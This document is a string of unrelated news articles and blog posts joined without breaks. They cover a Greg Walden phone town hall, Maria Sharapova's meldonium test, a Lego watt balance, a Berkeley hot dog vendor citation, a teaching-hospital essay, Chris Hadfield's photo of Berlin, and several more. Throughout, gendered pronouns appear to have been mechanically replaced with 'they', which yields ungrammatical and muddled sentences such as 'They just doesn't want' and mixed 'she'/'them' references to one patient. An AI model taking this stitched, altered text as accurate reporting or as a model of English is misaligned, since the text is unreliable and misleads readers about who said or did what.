A caller from the small town of Talent asked how Walden planned to reduce the cost of health care for individuals. Walden responded that they want to repeal the mandate that requires people have insurance or pay a penalty. They said the mandate drove up the cost of insurance for young, healthy people, many of whom decided to pay the penalty instead. That left a disproportionate amount of sick people on insurance markets, driving up costs.
“If we do nothing, these rates will continue to go up dramatically and be unsustainable,” Walden said.
Another caller was skeptical on that point. They told Walden insurance companies have promised to pull out of markets if the mandate is repealed because there wouldn't be young, healthy enrollees to drive costs down. They asked whether Congress will have a comprehensive replacement plan in place by the time the law is repealed.
“Because we don't see it,” they said. “We don't hear about it. All we hear about is repeal.”
Bend City Councilor Barb Campbell reminded Walden on the call that their constituents in Bend, the largest city in their district, have been trying for weeks to schedule an in-person town hall meeting.
“They do not believe that you being on the phone and taking a handful of calls is the same thing as coming to town and actually seeing your constituents,” they said.
Walden responded they host such meetings annually in each of their district's counties.
Campbell then asked Walden whether they support spending billions of taxpayer dollars to build a wall along the U.S.-Mexico border. They responded that they support building a wall where it makes sense.
“I'm not an open-borders guy,” Walden said. “I believe strongly that America is a country of laws and those laws should be enforced or changed and not just waived and that it's important to make sure we have a good immigration system that works.”
Another caller asked Walden why they have not joined the opposition to Trump's executive order on immigration that bans entry to people from seven Muslim-majority countries. They cited a September 2016 report from the libertarian Cato Institute that found Americans have a 1 in 3.64 billion chance of being killed in a terrorist attack caused by a refugee each year.
Walden responded they worry people coming into the U.S. are not properly vetted. They said they don't agree people with green cards should have been affected and felt it should have been carried out better.
“There are bad actors out there trying to infiltrate into countries via refugee programs and processes,” they said. “I think a temporary pause is not a bad thing if it's handled properly.”
In response to a question about whether they support policies that would permit the sale of public lands to the states, Walden said they would be in specific cases. They gave the example of federal legislation that transferred federal property located in northeast Bend — now Bend Pine Nursery Park — to the Bend Park & Recreation District, allowing it to be converted to a recreation area with softball fields, trails and a picnic area, among other amenities.
A Prineville resident asked about President Donald Trump's discussion of rolling back environmental policies such as the Clean Air Act and the Clean Water Act.
“Are we going to look like the skyline of China when we're finished here, where you can't even see 20 feet?” they said. “We live in a beautiful state that has clean rivers, beautiful forests and clean air, for the most part. It scares me to think that something like this is going to happen.”
Walden said Trump's executive orders don't supersede federal law and, if they do, will wind up in the courts, as some already are. They emphasized the need for agencies to work cooperatively with local communities to respond to environmental concerns.
Some people said they were not able to participate in the call despite having registered online. Seven people gathered at the Downtown Bend Public Library to listen to the call Monday. Although all seven signed up, only three received calls from Walden's office inviting them to participate. One of them was 62-year-old Sharon Rykels, of Bend, who said they thought Walden held their party line well.
“There were a couple of times where they answered the question they wished they had asked as opposed to the question that was asked,” they said.
Rykels repeated Campbell's call for Walden to come to Bend and meet with people in person.
— Reporter: 541-383-0304,
tbannow@bendbulletin.com
16387066
LOS ANGELES (Reuters) - Russian tennis star Maria Sharapova said on Monday they had failed a drug test at the Australian Open due to a substance they were taking for health issues, leading longtime sponsor Nike to announce it was suspending ties during the investigation.
The 28-year-old Sharapova, a five-time grand slam champion and the highest paid woman in sports, will be provisionally suspended starting March 12, the International Tennis Federation (ITF) said.
 They are the seventh athlete in a month to test positive for meldonium, which is used to treat diabetes and low magnesium, and was only banned by the World Anti-Doping Agency (WADA) as of January 1.
“I made a huge mistake. I let my fans down and I let the sport down,” said Sharapova, a teenage tennis prodigy who became the third-youngest Wimbledon champion. “I take full responsibility for it.”
“I know that with this I face consequences and I don't want to end my career this way. I really hope that I will be given another chance to play this game,” former world number one Sharapova told a news conference in a downtown Los Angeles hotel.
Nike, the world's largest sportswear maker, said it was “saddened and surprised” by the news and released a statement saying it was putting ties on hold with the player.
“We have decided to suspend our relationship with Maria while the investigation continues,” it said.
The ITF's anti-doping program calls for a four-year suspension for a positive test, but that ban can be reduced in various circumstances, such as for first-time offences or if the player shows no significant fault or negligence.
If a player bears no fault or negligence, there is no suspension.
TAKEN MELDONIUM FOR 10 YEARS
According to Forbes, they earned $29.5 million in 2015, mostly from endorsements.
Sharapova said their family doctor had been giving their mildronate, which is also called meldonium, for 10 years after they frequently became sick, had irregular EKG results, a magnesium deficiency and a family history of diabetes.
“It is very important for you to understand that for 10 years this medicine was not on WADA's banned list and I had been legally taking the medicine. But on January the first, the rules have changed and meldonium became a prohibited substance.”
WADA declined to comment until ITF issues a final decision.
Mar 7, 2016; Los Angeles, CA, USA; Maria Sharapova speaks to the media announcing a failed drug test after the Australian Open during a press conference today at The LA Hotel Downtown. Mandatory Credit: Jayne Kamin-Oncea-USA TODAY Sports
Meldonium is used to treat chest pain and heart attacks among other conditions, but some researchers have linked it to increased athletic performance and endurance. It is listed by WADA among its prohibited metabolic modulators, along with insulin, and some researchers say it can also help recovery.
It is not approved in the United States but is available in Russia, Latvia and other countries in that region.
Over the past month, Russian cyclist Eduard Vorganov, Russian figure skater Ekaterina Bobrova, Ethiopia-born athletes Endeshaw Negesse and Abeba Aregawi, and Ukraine biathletes Olga Abramova and Artem Tyshchenko have all tested positive for meldonium.
Sharapova is the most prominent tennis player to test positive for a banned substance in recent years.
Croatia's Marin Cilic was banned for nine months in 2013 after testing positive for a prohibited stimulant, though the suspension was cut to four months on appeal.
Former world number one Martina Hingis retired after receiving a two-year suspension for a positive cocaine test in 2007, though the Swiss denied taking the drug.
WTA SADDENED BY NEWS
Last year, the sport banned U.S. player Wayne Odesnik for 15 years after their second doping violation, testing positive for steroids and other banned substances.
Sharapova is the biggest name in sport to test positive since New York Yankees baseball slugger Alex Rodriguez was banned for a year in 2013 after using performance-enhancing drugs and American cyclist Lance Armstrong was banned for life from racing in 2012 after a U.S. Anti-Doping investigation.
Sharapova, one of the most popular figures in global sports, has long been a favorite with their sponsors. Cosmetics maker Avon Products Inc declined to comment on its endorsements.
Steve Simon, CEO of the Women's Tennis Association, said in a statement they were saddened to hear the news.
“Maria (Sharapova) is a leader and I have always known them to be a woman of great integrity,” they said.
“Nevertheless, as Maria acknowledged, it is every player's responsibility to know what they put in their body and to know if it is permissible. The WTA will support the decisions reached through this process.”
The news came a day after Sharapova's management team said they were going to make a “major announcement,” which had many speculating that they were going to announce their retirement from professional tennis.
Slideshow (3 Images)
Sharapova, who has struggled with a series of injuries in recent years, has not competed since they lost to Serena Williams in the quarter-finals of the Australian Open in January.
Renowned for their never-say-die approach, a gritty baseline game and high-decibel shrieking, Sharapova at 17 became the first Russian woman to win Wimbledon when they beat Serena Williams 6-1 6-4 in the 2004 final.
That victory also made them the third-youngest Wimbledon champion, behind only Lottie Dod and Hingis, and the fourth-youngest grand slam winner in the open era after Hingis, Monica Seles and Tracy Austin.
Planck's constant is one of the most important numbers in science. It describes the relationship between the energy and frequency of an electromagnetic wave in an equation known as the Planck-Einstein relation: E = hv (where E is energy, v is frequency and h is Planck's constant).
This constant is set to become even more important because physicists are about to change the definition of mass so that it depends on Planck's constant rather than on the mass of a lump of metal in a vault in Paris.
So it's not surprising that physicists need various ways to measure mass based on Planck's constant or, conversely, finding a value of Planck's constant based on a known mass. Today, Leon Chao at the National Institute of Standards and Technology in in Gaithersburg, Maryland, and a few pals, explain how to do this using an experiment built out of Lego.
Over the years, physicists at the National Institute of Standards and Technology have evaluated various different ways of carrying out this measurement and have settled on an experiment using a machine known as a watt balance.
This device is simple in principle. The idea is to balance the force on a mass due to gravity with the force generated by a current carrying coil in a magnetic field. The mass can then be calculated in a straightforward way by comparing the mechanical power to the electrical power involved in the experiment (the machines gets its name because electrical and mechanical power are both measured in watts).
The experiment involves measurements of only of the voltage and current through the coil as well as the velocity of the mass as it moves through the coil. It also requires an accurate value for g, the acceleration due to gravity, which can be easily read off a website operated by the National Oceanic and Atmospheric Administration by entering any location on the planet.
Planck's constant comes in because of an historical idiosyncrasy in the way power units have been defined. Since 1990, almost all electrical measurements have been calibrated using a system of units in which Planck's constant, along with various other constants, are defined rather than measured.
By contrast, mechanical power relies on ordinary SI units, which rely on a measured value of Planck's constant. “By comparing electrical power in conventional units to mechanical power in SI units, h can be determined,” say Chao and co.
All that is needed is a working watt balance and Chao and co describe how to build one using Lego, even providing a comprehensive parts list, much of which can be ordered from Lego's Pick-a-Brick website. They also give websites for purchasing other more specialist components.
The total cost of these parts is $634 but savings are possible. The most expensive component by far is a $300 data acquisition device followed by a $90 analogue output. Chao and co say these can both be replaced by single device costing only $189, thereby saving $200.
That puts the cost well within reach of many schools and even private individuals. “We hope to encourage many enthusiasts to build a LEGO watt balance and have fun toying with the science of measurement, metrology,” say the team.
With the holiday season just around the corner, many readers may find themselves hunting for gifts for significant others. A watt balance kit could be the perfect present for the physicist who has everything.
Ref: http://arxiv.org/abs/1412.1699 : A LEGO Watt Balance: An Apparatus To Demonstrate The Definition Of Mass Based On The New SI
Chili Peppers Singer Brawl with Bodyguard Outside Four Seasons
Red Hot Chili Peppers Singer Anthony Kiedis -- Brawl with Bodyguard Outside Four Seasons
EXCLUSIVE
-- Kiedis just gave us the best statement ever ... not even mentioning the fight ... telling TMZ, "I love the Rolling Stones." Yeah, he's that cool.singerjust threw down with a security guard outside the Four Seasons in Philly -- after the hired muscle REFUSED to let Kiedis enter the hotel -- and the footage is insane.In the footage, Kiedis approaches the hotel with their lady friend and security blocks them from entering. The security guard lunges, and a massive fight erupts.Sources on scene tell TMZ, the Rolling Stones were making their exit from the hotel at the same time Kiedis was approaching -- and the security guard thought Kiedis was just another fan.But the mystery ... no one's saying who the bodyguard works for.A rep for Four Seasons Philly is denying the security guard works for the hotel. A source close to the Stones insists they don't work for them either ... at least not directly.The Stones source says it's possible the bodyguard was hired in Philly to supplement the band's regular security.
My Secret Santa (A.B.) is amazing! And it's not just because of the gift but because of the personal touches and thought they put into the whole experience.
It started with a message letting me know my gift was shipped but coming from another continent so I should be patient. My mind was whirring trying to guess it, and I didn't even check the tracking because I wanted a surprise. And the past weeks I've been as excited as a kid again. The Secret Santa Exchange gives that feeling back to everyone. Thank you for that! So tonight my mystery was solved...Denmark!!
The package was small, but heavy and I couldn't help but smile all 17 floors to my apartment. Even my roommate was excited as I had texted them a warning that it came.
After opening the outside wrapping I first found a letter taped to my wrapped gift. This is my first year and even watching the gallery I hadn't thought of a letter. This was the touch that made everything perfect!! My Secret Santa introduced themselves and gave some background about their studies here in the U.S. They also explained the gift: two beautiful wall plaques with antique Danish imagery. One a representative of Tuborg beers, and the other for a Danish T.V. Company that includes the country flag. I'm totally blown away! They combined my love for photography, art, graphics, travel, and antiques into one (two pieces ;) amazing gift!! These are going to fit right in with my colorful and eclectic decor. In fact I already know where they'll hang!
Overall I can't be thankful enough. It's totally unbelievable that a stranger so far away would care enough to think about me and pick out something that I would totally buy for myself; it brings tears to your eyes.. I will always think of my Secret Santa and this awesome experience every time I look at my new gifts on the wall. The roomie loudly proclaimed that he's definitely participating next year!
The International Olympic Committee announced on Wednesday that they will add an anti-discrimination clause to host city contracts.
So in order to host the 2022 Olympic Games, cities must pledge to adhere to a principle of the Olympic charter which prohibits discrimination. The move is a result of the pushback the IOC faced from human rights organizations following the Winter Games in Sochi, Russia, where homophobic policies and incidents were rampant.
The Brief Newsletter Sign up to receive the top stories you need to know right now. View Sample Sign Up Now
The updated clause calls for the prohibition of “any form of discrimination,” under the rules of Principle 6 of the Olympic Charter, which bans “any form of discrimination with regard to a country or a person on grounds of race, religion, politics, gender or otherwise.” LGBT rights organizations All Out and Athlete Ally championed the Principle in an effort to get athletes and fans to speak out against the anti-LGBT laws in Russia.
Organizations like Human Rights Watch also urged the IOC to add a human rights provision to its host city contract for future games.
Co-founder and executive director of All Out, Andre Banks, called the IOC's announcement a “significant step in ensuring the protection of both citizens and athletes around the world.”
Contact us at editors@time.com.
Like all entrepreneurs, Beto Matias saw an opportunity to support their family while simultaneously creating value for their community.
Finding a prime spot right outside UC Berkeley's football stadium, Matias began selling their craft hot dogs to willing consumers. No one complained about the quality of Matias' hot dogs, nor did anyone have any objections to their presence outside of the stadium. But that didn't stop the state from intervening.
Street Theft
Flores knew something wasn't right when they saw the officer reach for Matias' wallet.
Officer Sean Aranas approached Matias as they were going about their business and asked to see identification. Matias, in complete compliance with the officer's demands, began sifting through their wallet in search of their identification. But this is where the story took a devastating turn.
Before Matias was given the opportunity to hand Aranas their ID, the wallet was ripped from their hands. And instead of merely examining their identification, Officer Aranas proceeded to confiscate the $60 Matias had in their wallet at the time. It was not until after this strong-arm mugging that the officer finally explained to Matias that they were being cited for failing to obtain a business permit.
Luckily, one of Matias' customers filmed the entire encounter on their smartphone and the video has since gone viral.
Martin Flores knew something wasn't right when they saw the officer reach for Matias' wallet. Thankfully, as so many of us are trained to do in the digital age, they pulled out their smartphone and immediately began documenting the encounter. And they did so just in the nick of time.
In Flores' footage, viewers see the wallet physically taken from Matias as their hard-earned money is stolen right before their eyes. In the background, Flores can be heard saying, “That's not right.”
The most innocuous activities now require state permission: from selling hot dogs to playing tennis.
Flores even took their role in the matter one step further and while filming, inquires why the officer deemed it necessary to target this innocent vendor over the loud display of public intoxication that was occurring directly across the street. The only response Aranas supplied Flores with was, “Yeah, well they don't have a permit. They don't have a permit.”
Penalized for Hard Work
To be sure, Matias never denied their lack of a business permit. But they were shocked and taken aback by Aranas' actions. To be handed an arbitrary citation is one thing, but to have your cash simply snatched by an officer of the law is especially egregious.
Matias later told Telemundo 48:
“I had already shown them my ID. They saw that I was not doing anything wrong, neither stealing nor anything, I was just working to support my family.”
Unfortunately, this kind of thing happens every day.
The most innocuous activities now require state permission: from selling hot dogs to playing tennis. No one can economically survive without a job. And yet, for many, our government makes it impossible to do so without first running an obstacle course of red tape. For a country founded on freedom of opportunity, something has gone horribly wrong. The market has its own means of protecting consumers through feedback.
In the American workforce, over 30 percent of jobs require an occupational license before an individual can legally earn a living. To make matters worse, many of these permits and licenses target those in the most vulnerable socioeconomic brackets. Not only are these licenses often expensive and require a great deal of paperwork, they are completely arbitrary.
As often as “public health and safety” is cited as justification, licensing does very little to ensure this. It doesn't matter how well-intentioned the state may be, a permit cannot prevent food poisoning. Occupational licensing has, however, been extremely successful in limiting the number of individuals entering a given work sector. It has also helped protect established industries from unwanted competition, for example, shutting down a “rogue” hot dog vendor operating without a license.
But of the many things licensing does, protecting the consumer is most certainly, not among them.
The market has its own means of protecting consumers through feedback. Even before platforms like Yelp and Google allowed for a free flow of review culture, word of mouth has always served to help keep business owners accountable.
Additionally, consumer loyalty says a lot about a product or service. This is not the first time Matias has sold hot dogs from their cart, and their consumers keep coming back. And “shockingly” enough, no one has died or even reported any instances of foodborne illnesses.
The quality of a service speaks for itself, and this is something that cannot be obtained through a government license.
Unfortunately, many victims of state abuse are never vindicated.
Outsourcing Justice
Stories like Matias' occur every day in this country. Unfortunately, many victims of state abuse are never vindicated. But our digital age is changing all this.
Not only is video footage like Flores' helping to keep law enforcement accountable for their actions, but crowdsourcing is helping to right the wrong done to Matias, something the state is unlikely to do anytime soon — or ever.
After the footage went viral, social media activists started a GoFundMe page to mitigate the financial losses felt by Matias and their family. The original fundraising goal was set at $10,000. But since the campaign's launch on Monday morning and the continuous sharing of the footage of the encounter with the officer, over $80,000 has been raised to help cover Matias' pay for legal fees and recoup their losses. And the donations keep pouring in.
As for the officer involved, an online petition calling for their immediate termination has already garnered 20,000 signatures. However, the university seems apathetic to the entire incident, claiming that the officer was conducting business as usual.
A representative did make a statement saying:
We are aware of the incident. The officer was tasked with enforcing violations related to vending without a permit on campus. UCPD is looking into the matter.”
In other words, Officer Aranas was “just doing their job.” And unfortunately, the promise of the UCPD “looking into the matter,” does little to calm the fears of many Americans who are tired of having to read about these stories on a weekly basis. Even worse, are the many Americans forced to become part of this narrative as a result of bureaucratic licensing.
But fortunately, social media has acted as the arbiter of justice. And while Officer Aranas' future in law enforcement is probably just as secure as it was before the incident occurred, at least voluntary crowdsourcing has provided the means to keep the Matias family afloat and perhaps, help them expand their venture and add even more value to their community.
One word: Wow. Jack White is producing the new release from fellow Detroit natives Insane Clown Posse — yes, the duo in face paint rapping about murdering people with hatchets — and Nashville rockers JEFF the Brotherhood have joined the project as the backing band. Do collaborations get weirder than that?
The record will be their interpretation of a lesser known Wolfgang Amadeus Mozart piece from 1782 called “Leck Mich Im Arsch,” which is literally translated as “Lick me in the arse.” Listen below.
According to a press release, the 2011 version of “Leck Mich Im Arsch” marries “Mozart's melody and lyrics sung in operatic German with ICP's poignant lyrical addition in English and Jeff the B's monster-riffs.” The B-side of the single is “Mountain Girl,” an original composition, which has ICP's Violent J and Shaggy 2 Dope dropping verses about country life — shotgun weddings, meth addiction, and moonshine.
The 7-inch single and iTunes download of “Leck Mich Im Arsch” will be available on September 13, and 100 tri-color vinyl copies of the single will be sold at the Third Man Rolling Record Store starting September 17 at the MI Fest in Brooklyn, Michigan, where the Raconteurs will be performing. Another 50 tri-color vinyls will be randomly inserted into mail orders dispatched by Third Man Records.
White and ICP filmed a teaser video for the upcoming collaboration: “The music collaboration you've all been waiting for,” it says. “230 years in the making.” Watch below.
LISTEN: Insane Clown Posse. “Leck Mich Im Arsch”
WATCH: Jack White & ICP teaser video
UNITED NATIONS (Reuters) - The United Nations said on Wednesday that Congo Republic will withdraw its troops from a U.N. peacekeeping mission in the Central African Republic after a review sparked by sexual abuse accusations found “systemic problems in command and control.”
The country has some 630 troops on the ground in the Central African Republic, according to the latest U.N. figures. A U.N. database of sexual abuse and exploitation accusations showed three reported incidents involving Congo Republic troops in the Central African Republic this year. Nine were reported in 2016.
“The review of the deployment of uniformed military personnel from the Republic of Congo found that the nature and extent of existing allegations of sexual exploitation and abuse, in their totality, point to systemic problems in command and control,” the United Nations said in a statement.
“These problems have also been compounded by issues related to the preparedness, overall discipline, maintenance of contingent owned equipment, and logistical capacity of these troops,” it said.
The world body said the review was shared with the Congo Republic authorities who then “decided to withdraw their military personnel.”
The 13,000-strong peacekeeping mission is seeking to contain violence in a multi-year conflict driven by ethnic and religious grievances and vying over vast diamond resources.
The United Nations said some 140 Congo Republic police would remain part of the peacekeeping mission in the Central African Republic because “failures identified with the military contingent are not reflected by the performance of the police.”
Military fires public affairs official for refusing to limit press at funerals David Edwards and Muriel Kane
Published: Friday July 11, 2008
Print This Email This The Department of Defense has attempted for years to manipulate popular opinion towards the war in Iraq by limiting press coverage of military funerals. When Gina Gray, a media specialist with a long history of working with the military, became public affairs director at Arlington National Cemetery earlier this year, they found that officials there had started hampering media coverage even in cases where the families gave permission. When they tried to uphold the existing regulations, they were harassed by their supervisor, demoted, and then fired. Gray appeared on MSNBC's Verdict with David Shuster on Thursday for their first live interview, along with their attorney, Mark Zaid, who has a history of involvement in high-profile cases involving government secrecy. "I had no idea I was going to be fired," Gray explained, "but I certainly ... butted heads. ... I wanted there to be clear rules ... and cemetery officials felt like they were the exception to the rule, that they didn't have to play by the same rules." "It's up to the families to decide how close or far away they want the media to be," Gray continued. "It is not up to Arlington Cemetery officials to do that." In the case that first brought Gray into conflict with their supervisors, the media area had been placed 50 yards away from the gravesite, obstructing the view of photographers and making the service inaudible. Shuster next turned to Roy Sekoff of the Huffington Post, who stated, "This is part and parcel of the Bush administration's policy of trying to keep the human toll of the Iraq War hidden. ... They talk about sacrifice, they like to use it as an applause line in a stump speech, but they don't want the American people to see that that sacrifice also includes grieving widows and kids who are never going to have a dad." Shuster then returned to Gray, asking about their termination notice, which complained, "You have failed to follow my instructions ... failed to provide me with complete details for your work assignments, been disrespectful to me as your supervisor and failed to act in an inappropriate [sic] manner." "I'm guilty of not acting inappropriately," Gray noted wryly. They went on to explain, "Army public affairs did step in and did try to make the changes. But you have a deputy director, Thurman Higginbotham, who has been there for over 30 years and is kind of running the show on their own. He's making up the rules as they go along." Mark Zaid added that this was a matter of a "hostile work environment, not just for Gina but their two predecessors." "There is an administrative action pending under the Equal Employment Opportunity Office," Zaid stated. "You're going to see some skeletons unearthed at Arlington." This video is from MSNBC's Verdict, broadcast July 10, 2008.
Download video
What they want seems reasonable enough, a request I've heard from patients before. During my 40 years as a clinician-educator at academic medical centers, I've come to rely on a redoubtable reply: That's not the way we do things here. This is a teaching hospital. If you don't want residents or students participating in your care, you should go somewhere else.
This time, though, before I speak, my rote response rings wrong. Mrs. A. didn't choose to come here; an ambulance brought them after they collapsed on the street. Now, as they lie in our emergency department awaiting an inpatient bed, all we know is that she's 82 years old, frail, febrile, and pancytopenic. Telling them to go elsewhere if they don't like our rules seems uncaring, even smug. It's also bad medical advice. Whatever Mrs. A.'s diagnosis, I know that I and my team of house staff can help her, not something I can say confidently about “somewhere else.”
They need no convincing on this point. Mrs. A. doesn't want to go somewhere else. She's never been a patient here before, but they respect this hospital's reputation. They just doesn't want “student doctors” taking care of them They want “real doctors,” not ones who are “still learning.”
I don't tell them that I'm still learning myself. Nor do I tell them about the old days when every patient here, even on the white-shoe private service, was considered “teaching material.” Back then, of course, the house staff greatly preferred the ward service because there they ran the show, notwithstanding occasional “visits” from teaching faculty. That's one reason why the great public hospitals of yesteryear — Cook County, Charity, Boston City, Bellevue — were so popular among medical students. There, on those teeming open wards (and tubercular fresh-air porches), residents' autonomy was rarely challenged, their professional growth (and confidence as “real doctors”) accelerated by peer pressure, personal pride, and undiluted accountability for their patients. Were those patients less safe, less cared for, than patients here and now? It's hard to say.
Today, most teaching hospitals, like mine, staff nonteaching services. These have grown exponentially in recent years as restrictions on residents' work hours tighten, caps on teaching census shrink, the number of federally funded positions for graduate medical education remains fixed, and hospital executives (including many trained as physicians) value patient throughput more than medical education. In fact, many academic centers today admit more patients to nonteaching services than to teaching services, despite large government subsidies for their teaching status. These dramatic changes, salutary or not, offer an easy way out when dealing with “demanding” patients like Mrs. A. No longer are the options limited to my way or the highway. Not a problem, ma'am. I'll arrange your transfer to the nonteaching service.
And yet, in Mrs. A.'s case, that response doesn't ring right either. Am I really indifferent to these options? Don't I think Mrs. A. will receive better care on the teaching service? Isn't that one reason why I've spent my career in hospitals like this one? I'm a competent clinician — as is every hospitalist who staffs our nonteaching service — but I know I raise my game when I work with residents and students. They make me better — even now, after all these years.
I can't prove it: clinical expertise doesn't lend itself easily to objective measurement, much less controlled trials. (If I could prove it, I would ask patients to give informed consent for admission to the nonteaching service.) But I know it as surely as I remember Mrs. J. in Chicago, whose severe pernicious anemia explained their dyspnea until my intern heard the diastolic rumble I had missed; and Mr. R. in Manhattan, whose raging illness stumped me cold until my resident taught me about familial Mediterranean fever; and Mrs. K. in Rochester, whose near-fatal drug addiction remained undiscovered until my medical student made the effort to bond with their family. Patients' stories are clinicians' lifeblood and conscience; they make us who we are. Shouldn't I tell Mrs. A. who I am? How my student doctors can help her, too?
But who has the time? I'm busy. So are my residents and students; the last thing they need is a patient who doesn't want them. Besides, even if the evidence of superior quality of care in teaching hospitals was more convincing — and even if we could explain teaching hospitals' lower patient-satisfaction scores1 — would it matter in Mrs. A.'s case? No less an opinion leader than Donald Berwick has opined that clinicians' best, evidence-based professional judgment “must take a back seat” to patients' wishes.2 Patient-centeredness, in this view, means that clinicians should give patients what they want even if they don't need it.
The clinical and economic infeasibility of this idea makes me cringe. (Misplaced car keys might become the prevailing indication for brain MRI.) And yet in Mrs. A.'s case, I feel its appeal. Can't doctor both save time and get higher patient-satisfaction marks if we just nod deferentially to “customers” like Mrs. A. and do what they want?
Yes, we can. But as Berwick noted, far from being an easy way out, responsible patient-centeredness presupposes a “mature dialogue” between doctor and patient. Curiosity would seem a minimum requirement. Why does Mrs. A. want what they want? Why would a patient spurn my residents and students before even meeting them?
Published research has not addressed such questions. It is unknown, for example, how surgeons and procedural specialists in teaching hospitals parry patients' queries about who will wield the scalpel, scope, or catheter in their case. It is also unknown how frequently patients feel reassured by the answers they receive or how faithfully these promises are kept in operating rooms and procedural suites. In teaching hospitals today — some observers wish we called them “learning hospitals” — such issues deserve more attention. Physicians-in-training have expressed well-founded concerns that recent work-hour restrictions might diminish their preparedness for independent practice.3,4 Might patients' reluctance to serve as “teaching material” pose a similar threat to the quality of our future physician workforce?
But when Mrs. A. answers my question why, they don't mention teaching material or guinea pigs. They don't dread amateurish invasions of their privacy or the frustration of answering the same questions again and again. They don't allude to dark rumors about unsupervised residents run amok. They talk about their late husband's final hospitalization at another academic center. There, they heard often about Mr. A.'s team of doctors, but they never saw them all together. When an intern or student or senior physician popped in, they or they usually came alone and was always in a hurry. Mrs. A. couldn't tell whether they talked to each other because often one didn't know what another one did. And each time their husband needed help at night, a different stranger came.
I transfer Mrs. A. to the nonteaching service, wishing them well. I don't tell them how my team conducts itself here, so differently from what they saw elsewhere. My residents and I will go off service tomorrow, our 4-week rotation over, and I can't promise that the new team will run their show as we run ours. Nor can I promise that the nonteaching service will satisfy them more. After all, their aversion to the teaching service has nothing to do with teaching.
But tomorrow, other patients will ask more pointed questions. Having embraced patient-centeredness with gusto, they'll want to know how clinical teaching benefits them. How should I answer? Will I say that clinical teaching, like its subject matter, is more art than science (and thus lacks gravitas in academic centers today)? Will I admit that this art dances to different drummers (no two teachers teach alike) refereed by recondite rules (no one teacher inarguably better or worse than another)? Will I claim that these are strengths, not weaknesses, and that effective clinical teaching is all about listening (hard to measure), adaptability (hard to judge), and impromptu exploitation of “teachable moments” (hard to plan)?5 And after we've had our mature dialogue, will these patients buy my assertions? Or will my customers be a hard sell?
Learning hospitals would do well to learn more about these things.
The image, published by a Canadian astronaut, shows bright white light around the government quarter in the heart of the city and the shopping districts of west Berlin, contrasting with a softer yellow glow in the east.
A dark patch in the centre of the image shows the location of the Tiergarten, the park in the middle of the capital.
The image from space highlights the higher levels of commercial activity in the west, over two decades after the fall of the Wall.
The capital's biggest concentration of luxury shops is along Kurfuerstendamm, a west Berlin boulevard. A number of retailers who opened branches in east Berlin after reunification have since closed these, and focused on the west of the city, citing greater loyalty from customers.
Chris Hadfield, who is commander of Expedition 35 on the International Space Station, published the image on social media with the caption: "Berlin at night. Amazingly, I think the light bulbs still show the East/West division from orbit."
Nearly a fifth of the street lights in the German capital are gas-powered, yielding a softer illumination. City authorities plan to replace these lights with electric lamps to reduce energy consumption.
Commander Hadfield has become enormously popular on social media after posting a series of eye-catching images of the earth from space. The latest pictures they have published include a bright white salt pan captured against the red earth of the Australian Outback – captioned "A splash of dry salt white on seared red in Australia's agonisingly beautiful Outback" – and an image of Paris showing the Champs-Elysees from orbit.
Their Twitter feed has included accounts of shaving in zero gravity and details of an astronaut's breakfast.
“Greenlight will provide an incredible level of added exposure for new games and an opportunity to connect directly with potential customers and fans.” – From Valve Press Release, August 30, 2012
When Valve announced Steam Greenlight as a way for game developers to get on Steam (One of the largest PC game markets in the world) we were pumped. Instead of having to go through a publisher (or know some industry black magic) we could present our game right on the platform. Race the Sun was in early alpha at the time, but we were encouraged to publish concepts and early footage of the game to start building an audience. We put together and published Greenlight just as the service launched.
Things didn't go as planned.
Instead of a rush of interest and exposure for unfinished projects, many gamers rushed to down-vote anything that didn't seem to meet their standards. Our game was (admittedly) not ready for prime-time and we got hit hard. Since that time we've been working our brains off to make Race the Sun the best possible game it can be – the game we've always seen in our minds. Everything from the worlds, to the multiplayer, to the world-creation tools have been taken to the next level. We've even had a successful 20k Kickstarter with over 1100 backers.
The problem is that the needle isn't moving on Greenlight. It's like everybody saw our early alpha footage and then we got buried under a pile of other games. The fact is we are a small company and we don't have a lot of money to advertise our Greenlight page. Our time is also limited as we really want to focus on making a great game. We are committed to somehow cracking the Greenlight nut, and we will continue to pound the pavement talking about this game. We are reaching out to YouTube reviewers and contacting every website and blog that we can, but we can only do so much.
Through our Kickstarter experience we've seen how people can band together to make amazing things happen. We believe it can happen again, so we are turning to the only resource we really have – our awesome friends. We are asking for help in spreading the word about our Greenlight page. Every Favorite, Follow, Share, Tweet and Post matters!
Let's unbury this game!
Ubisoft's I Am Alive made the waves a couple of years back when it was announced that Jade Raymond, producer of Assassin's Creed, was working on it. Since then, very little word has come out about the game—until now, that is.
Today, Ubisoft revealed that I Am Alive is set for a winter release on the PlayStation Network and XBLA. It presumably follows in the footsteps of From Dust and not have a physical edition.
I Am Alive puts you in the shoes of a man who seeks to find their wife and daughter following a devastating earthquake that leaves the city of Chicago in ruins. They must find their way back to the town of Haventon amidst the chaos.
You must survive the environment and defend themselves against other stragglers who challenge you for what limited supplies you can find. The game's combat system will allow you to intimidate your enemies by scaring them off with your weapon or use the environment to your advantage.
"We know people have been waiting for this game to arrive, and we believe it's going to be worth the wait," said Ubisoft's Adam Novickas.
"I Am Alive presents a unique take on the post-apocalyptic, survival genre by creating more complex and emotional situations for the player."
A video of the game can be seen below.
Too much of a protein called c-FLIPR can trigger autoimmune diseases
HZI/PilsAs strange as it may seem, a process called "cellular suicide" is actually crucial for the survival of the entire body. The protein c-FLIPR plays a key role in controlling this process, which is called " apoptosis ". Scientists at the Helmholtz Centre for Infection Research (HZI) have described the significance of c-FLIPR for the immune system in more detail: In the presence of an excess of this molecule, mice can fight infectious diseases better, but they develop autoimmune diseases as they get older. The inhibitory effect of c-FLIPR on apoptosis is the underlying cause of both these effects. The researchers published their results in "Cell Death & Disease".
Apoptosis is used by cells that are changed by disease or are simply not needed any longer to eliminate themselves before they become a hazard to the body—on a cellular level, death is part of life. Disruption of this process can lead to cancer or immunodeficiencies, but also to autoimmune diseases, in which cells attack their own body.
HZI scientist Prof Ingo Schmitz and their team investigate the regulation of apoptosis in the immune system . In collaboration with researchers of the Otto von Guericke University Magdeburg and the Helmholtz Zentrum München, they elucidated the role of a central protein in this process. So-called c-FLIP proteins inhibit signaling cascades that can lead to apoptosis . This is important temporarily in the response to pathogens to ensure that lymphocytes , a type of immune cells, can proliferate sufficiently. Towards the end of the immune response, once the lymphocytes completed their tasks and successfully eliminated the pathogen, c-FLIP is usually degraded. As a result, apoptosis is enabled again, the lymphocytes die and the equilibrium in the immune system is restored.
